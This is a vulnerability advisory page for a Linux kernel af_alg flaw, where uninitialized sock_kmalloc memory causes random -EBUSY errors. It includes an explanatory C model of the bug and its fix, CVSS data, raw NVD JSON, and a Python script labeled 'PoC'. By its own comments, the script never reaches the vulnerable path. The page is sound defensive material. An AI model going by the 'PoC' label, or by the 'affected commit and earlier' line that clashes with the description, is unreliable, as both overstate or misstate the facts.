Security Vulnerability Report
CVE-2025-71113 CVSS 5.5 MEDIUM


Published: 2026-01-14 15:16:00
Last Modified: 2026-03-25 19:58:42
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

crypto: af_alg - zero initialize memory allocated via sock_kmalloc

Several crypto user API contexts and requests allocated with sock_kmalloc() were left uninitialized, relying on callers to set fields explicitly. This resulted in the use of uninitialized data in certain error paths or when new fields are added in the future.

The ACVP patches also contain two user-space interface files: algif_kpp.c and algif_akcipher.c. These too rely on proper initialization of their context structures.

A particular issue has been observed with the newly added 'inflight' variable introduced in af_alg_ctx by commit:

67b164a871af ("crypto: af_alg - Disallow multiple in-flight AIO requests")

Because the context is not memset to zero after allocation, the inflight variable has contained garbage values. As a result, af_alg_alloc_areq() has incorrectly returned -EBUSY randomly when the garbage value was interpreted as true:

https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209

The check directly tests ctx->inflight without explicitly comparing against true/false. Since inflight is only ever set to true or false later, an uninitialized value has triggered -EBUSY failures. Zero-initializing memory allocated with sock_kmalloc() ensures inflight and other fields start in a known state, removing random issues caused by uninitialized data.
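The following is an added example written for this page, not kernel code: a user-space model of the bug class (CWE-908, use of uninitialized memory) and of the fix. A constructed one-slot slab stands in for the recycled memory that sock_kmalloc() hands back without clearing; the struct name af_alg_ctx, the inflight flag and the -EBUSY check mirror the description above, while model_sock_kmalloc, model_sock_kzalloc, dirty_slab, run_unfixed and run_fixed are names invented for this example.

```c
/* Added example, not Linux kernel code. Models why a non-zeroed allocation
 * makes af_alg_alloc_areq()'s "if (ctx->inflight)" check fail spuriously,
 * and why zero-initializing the allocation removes the problem. */
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for struct af_alg_ctx: only the fields needed here. */
struct af_alg_ctx {
    size_t used;    /* bytes queued by the caller; always set explicitly */
    bool inflight;  /* "one AIO request in flight"; set only by the AIO path */
};

/* Constructed slab: a single fixed slot that is reused across allocations,
 * the way a slab cache recycles freed objects. */
static unsigned char slab[64];

/* Model of sock_kmalloc(): returns the slot as-is, with whatever the
 * previous owner left in it. No clearing. */
static void *model_sock_kmalloc(size_t len)
{
    return len <= sizeof(slab) ? slab : NULL;
}

/* Model of the fix: same allocation followed by zeroing (kzalloc semantics). */
static void *model_sock_kzalloc(size_t len)
{
    void *p = model_sock_kmalloc(len);
    if (p)
        memset(p, 0, len);
    return p;
}

/* Mirrors the check in af_alg_alloc_areq(): a non-zero flag means "busy". */
static int alloc_areq(const struct af_alg_ctx *ctx)
{
    if (ctx->inflight)
        return -EBUSY;
    return 0;
}

/* Simulate a previous owner that left a byte pattern behind. The value 0x01
 * is a valid bool representation, so reading it as "true" is well defined. */
static void dirty_slab(void)
{
    memset(slab, 0x01, sizeof(slab));
}

/* Vulnerable flow: allocate without zeroing, initialize only the field the
 * caller knows about, leave inflight as the allocator returned it. */
static int run_unfixed(void)
{
    dirty_slab();
    struct af_alg_ctx *ctx = model_sock_kmalloc(sizeof(*ctx));
    ctx->used = 0;              /* explicit init of the "known" field only */
    return alloc_areq(ctx);     /* leftover byte reads as true -> -EBUSY */
}

/* Fixed flow: zeroed allocation, so inflight starts out false. */
static int run_fixed(void)
{
    dirty_slab();
    struct af_alg_ctx *ctx = model_sock_kzalloc(sizeof(*ctx));
    ctx->used = 0;
    return alloc_areq(ctx);     /* inflight is false -> 0 */
}

int main(void)
{
    printf("unfixed: alloc_areq() -> %d (expected -EBUSY = %d)\n", run_unfixed(), -EBUSY);
    printf("fixed:   alloc_areq() -> %d (expected 0)\n", run_fixed());
    return 0;
}
```

The point the model makes is the one the description makes: the check is correct as written, and the defect is entirely in the allocation path. Initializing each known field by hand protects only the fields the caller knows about, so a field added later (here, inflight) silently inherits recycled memory; zeroing the whole allocation makes every present and future field start in a known state.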

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 2.6.38.1, up to but excluding 5.10.248) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.11, up to but excluding 5.15.198) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16, up to but excluding 6.1.160) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, up to but excluding 6.6.120) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15.x (versions without the fix applied)
Linux Kernel < 6.1.x (versions without the fix applied)
Linux Kernel < 6.6.x (versions without the fix applied)
Specifically affected commit: 67b164a871af and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-71113 PoC - Linux Kernel af_alg Memory Initialization Vulnerability
# This PoC demonstrates the uninitialized memory issue in af_alg module
import socket

# Python's socket module supports AF_ALG natively on Linux (3.6+), so the
# sockaddr_alg layout does not need to be rebuilt with ctypes. The fallback
# value 38 is the AF_ALG number from linux/socket.h.
AF_ALG = getattr(socket, "AF_ALG", 38)
# AF_ALG sockets must be SOCK_SEQPACKET (5); the original used 2 (SOCK_DGRAM).
SOCK_SEQPACKET = socket.SOCK_SEQPACKET


def create_af_alg_socket():
    """Create an AF_ALG socket for testing; returns None on failure."""
    try:
        return socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
    except OSError as e:
        print(f"[-] Failed to create AF_ALG socket: {e}")
        return None


def bind_alg(sock, alg_type, alg_name):
    """Bind to a specific algorithm, e.g. ("skcipher", "cbc(aes)")."""
    try:
        # The stdlib fills in struct sockaddr_alg (salg_type, salg_name).
        sock.bind((alg_type, alg_name))
        return 0
    except OSError as e:
        print(f"[-] Failed to bind to {alg_name}: {e}")
        return -1


def test_uninitialized_memory():
    """Test for uninitialized memory in af_alg context"""
    print("[*] CVE-2025-71113 PoC - Testing af_alg uninitialized memory")
    print("[*] This vulnerability causes random -EBUSY errors due to uninitialized inflight variable")

    # Check once that AF_ALG sockets can be created at all
    sock = create_af_alg_socket()
    if sock is None:
        return
    sock.close()

    # Try binding to various algorithms to trigger the issue
    test_algs = [
        ("aead", "gcm(aes)"),
        ("skcipher", "cbc(aes)"),
        ("hash", "sha256"),
    ]
    error_count = 0
    total_attempts = 100
    ops_per_bind = 5
    for _ in range(total_attempts):
        for alg_type, alg_name in test_algs:
            test_sock = create_af_alg_socket()
            if test_sock is None:
                error_count += 1
                continue
            try:
                if bind_alg(test_sock, alg_type, alg_name) == 0:
                    # Operation simulation: no request is issued here, so this
                    # loop does not reach af_alg_alloc_areq(); the -EBUSY
                    # path is only hit by AIO requests on an accepted socket.
                    for _ in range(ops_per_bind):
                        pass
                else:
                    error_count += 1
            finally:
                test_sock.close()

    print(f"[*] Completed {total_attempts * len(test_algs) * ops_per_bind} operation attempts, {error_count} errors")
    print("[*] Note: Random EBUSY errors on AIO requests indicate the uninitialized memory issue")
    print("[*] Mitigation: Apply kernel patch to zero-initialize sock_kmalloc memory")


if __name__ == "__main__":
    test_uninitialized_memory()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71113", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:00.433", "lastModified": "2026-03-25T19:58:42.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n'inflight' variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx->inflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. 
Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ncrypto: af_alg - inicializar a cero la memoria asignada a través de sock_kmalloc\n\nVarios contextos y solicitudes de API de usuario de criptografía asignados con sock_kmalloc() quedaron sin inicializar, dependiendo de que los llamadores establecieran los campos explícitamente. Esto resultó en el uso de datos no inicializados en ciertas rutas de error o cuando se añadan nuevos campos en el futuro.\n\nLos parches ACVP también contienen dos archivos de interfaz de espacio de usuario: algif_kpp.c y algif_akcipher.c. Estos también dependen de la inicialización adecuada de sus estructuras de contexto.\n\nSe ha observado un problema particular con la variable 'inflight' recién añadida introducida en af_alg_ctx por el commit:\n\n67b164a871af ('crypto: af_alg - Disallow multiple in-flight AIO requests')\n\nDebido a que el contexto no se inicializa a cero con memset después de la asignación, la variable inflight ha contenido valores basura. Como resultado, af_alg_alloc_areq() ha devuelto incorrectamente -EBUSY de forma aleatoria cuando el valor basura fue interpretado como verdadero:\n\nhttps://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nLa comprobación prueba directamente ctx-&gt;inflight sin comparar explícitamente con verdadero/falso. Dado que inflight solo se establece como verdadero o falso más tarde, un valor no inicializado ha provocado fallos -EBUSY. 
La inicialización a cero de la memoria asignada con sock_kmalloc() asegura que inflight y otros campos comiencen en un estado conocido, eliminando problemas aleatorios causados por datos no inicializados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.38.1", "versionEndExcluding": "5.10.248", "matchCriteriaId": "85CCF4CB-6825-4C1B-8A0B-FE74D6967635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": "C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:* ... (truncated)